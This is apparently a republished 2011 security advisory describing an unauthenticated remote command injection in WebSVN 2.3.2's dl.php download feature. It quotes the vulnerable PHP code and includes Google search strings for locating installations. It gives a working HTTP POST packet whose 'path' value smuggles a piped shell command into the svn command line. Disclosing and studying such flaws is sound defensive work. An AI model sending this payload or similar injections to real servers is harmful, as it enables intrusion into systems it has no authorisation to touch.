Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:26463
HistoryJun 03, 2011 - 12:00 a.m.

WebSVN 2.3.2 Unproper Metacharacters Escaping exec() Remote Commands Injection Vulnerability

2011-06-0300:00:00
vulners.com
41
JSON

WebSVN 2.3.2 Unproper Metacharacters Escaping exec() Remote Commands Injection Vulnerability

tested against: Microsoft Windows Server R2 SP2
PHP 5.3.6 VC9 with magic_quotes_gpc = off (default)
Apache 2.2.17 VC9

Introduction:
This is a very special vulnerabilty, given the incredibly high number
of machines involved. This can be verified by submitting the following
queries to Google:

"Powered by WebSVN * and Subversion"
"Powered by WebSVN 2.3.2 and Subversion"

homepage url: http://websvn.tigris.org/

Description says:
"WebSVN offers a view onto your subversion repositories that's been designed to
reflect the Subversion methodology. You can view the log of any file or directory
and see a list of all the files changed, added or deleted in any given revision.
You can also view compare two versions of a file so as to see exactly what was
changed in a particular revision.

Since it's written using PHP, WebSVN is very portable and easy to install"

Vulnerabilty:

Without prior authentication, if the 'allowDownload' option is enabled
in config.php, meaning that a tarball download is allowed across all the
repositories (not uncommon), an attacker can invoke the dl.php script
and passing a well formed 'path' argument to execute arbitrary
commands against the underlying operating system.

Vulnerable code:

look at dl.php, lines 114-139:

.
} else {
@unlink($tempDir);
mkdir($tempDir);
// Create the name of the directory being archived
$archiveName = $path;
$isDir = (substr($archiveName, -1) == '/');
if ($isDir) {
$archiveName = substr($archiveName, 0, -1);
}
$archiveName = basename($archiveName);
if ($archiveName == '') {
$archiveName = $rep->name;
}
$plainfilename = $archiveName;
$archiveName .= '.r'.$rev;

            // Export the requested path from SVN repository to the temp directory
            $svnExportResult = $svnrep->exportRepositoryPath($path,

$tempDir.DIRECTORY_SEPARATOR.$archiveName, $rev, $peg);

            if ($svnExportResult != 0) {
                    header('HTTP/1.x 500 Internal Server Error', true, 500);
                    error_log('svn export failed for: '.$archiveName);
                    print 'svn export failed for "'.xml_entities($archiveName).'".';
                    removeDirectory($tempDir);
                    exit(0);
            }

.

then look at exportRepositoryPath() function inside ./include/svnlook.php, lines 879-896:
.
// {{{ exportDirectory
//
// Exports the directory to the given location

    function exportRepositoryPath($path, $filename, $rev = 0, $peg = '') {
            $cmd = $this->svnCommandString('export', $path, $rev, $peg).'

'.quote($filename); //<---------------
$retcode = 0;

            execCommand&#40;$cmd, $retcode&#41;; //&lt;----------------------
            
            if &#40;$retcode != 0&#41; {
                    global $lang;
                    error_log&#40;$lang[&#39;BADCMD&#39;].&#39;: &#39;.escape&#40;$cmd&#41;&#41;;
            }
            return $retcode;
    }

    // }}}

.

again look at execCommand() function inside ./include/command.php, lines 107-123:

.
// {{{ execCommand

function execCommand($cmd, &$retcode) {
global $config;

    // On Windows machines, the whole line needs quotes round it so that it&#39;s
    // passed to cmd.exe correctly
    // Since php 5.3.0 the quoting seems to be done internally

    if &#40;$config-&gt;serverIsWindows &amp;&amp; version_compare&#40;PHP_VERSION, &#39;5.3.0alpha&#39;&#41; === -1&#41; {
            $cmd = &#39;&quot;&#39;.$cmd.&#39;&quot;&#39;; //&lt;------------ nonsense ...
    }

    return @exec&#40;$cmd, $tmp, $retcode&#41;; //&lt;--------------------- boom

}

// }}}
.

also, look at quote() inside ./include/command.php:

.
// {{{ quote
//
// Quote a string to send to the command line

function quote($str) {
global $config;

    if &#40;$config-&gt;serverIsWindows&#41; {
            return &#39;&quot;&#39;.$str.&#39;&quot;&#39;; //&lt;--------------------------- !!!
    } else {
            return escapeshellarg&#40;$str&#41;; //&lt;------------ this should work properly on

Linux instead
}
}

// }}}
.

Example packet:

POST /websvn/dl.php HTTP/1.1
User-Agent: Mozilla/4.0
Host: 192.168.0.1
Accept: /
Cookie: storedsesstemplate=.%00; storedtemplate=.%00;
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

path=./…/…/x%22%7Cver%3Esuntzu.txt%7C%22

the resulting command line is like this:

"c:\SVN\bin\svn" --non-interactive --config-dir C:\SVN\tmp\export
"URL%20to%20repository%20%28e.g.%20file:///d:/SubVersion/proj%29./…/…/x%22%7Cver%3Esuntzu.txt%7C%22@"
"C:\Documents and Settings
\Administrator\Local Settings\Temp\web554.tmp\x"|ver>suntzu.txt|".r"

allowing you to inject arbitrary commands via the pipe char.

Proof of concept code:

http://retrogod.altervista.org/rgod_websvn_poc.html

original url: http://retrogod.altervista.org/rgod_websvn_adv.html

JSON